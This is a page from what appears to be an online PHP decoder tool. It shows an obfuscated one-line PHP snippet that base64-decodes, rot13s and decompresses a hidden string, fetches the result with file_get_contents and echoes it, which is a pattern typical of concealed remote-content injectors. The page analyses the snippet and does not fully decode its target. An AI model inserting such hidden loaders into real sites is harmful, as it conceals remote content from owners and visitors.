Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $sb0 = file_get_contents(gzuncompress(str_rot13(base64_decode('a5zLKCkpsNLXz60sQc3Py..
Decoded Output download
<?php $sb0 = file_get_contents(gzuncompress(str_rot13(base64_decode('a5zLKCkpsNLXz60sQc3PyczLzlrMWFlCLdJYzs/VL1cty1kt1zcFAABzDaE='))));?><?php echo $sb0 ?>
Did this file decode correctly?
Original Code
<?php $sb0 = file_get_contents(gzuncompress(str_rot13(base64_decode('a5zLKCkpsNLXz60sQc3PyczLzlrMWFlCLdJYzs/VL1cty1kt1zcFAABzDaE='))));?><?php echo $sb0 ?>
Function Calls
| str_rot13 | 1 |
| gzuncompress | 1 |
| base64_decode | 1 |
| file_get_contents | 1 |
Stats
| MD5 | e34445b41ef944c9633fc8cc07f0876f |
| Eval Count | 0 |
| Decode Time | 85 ms |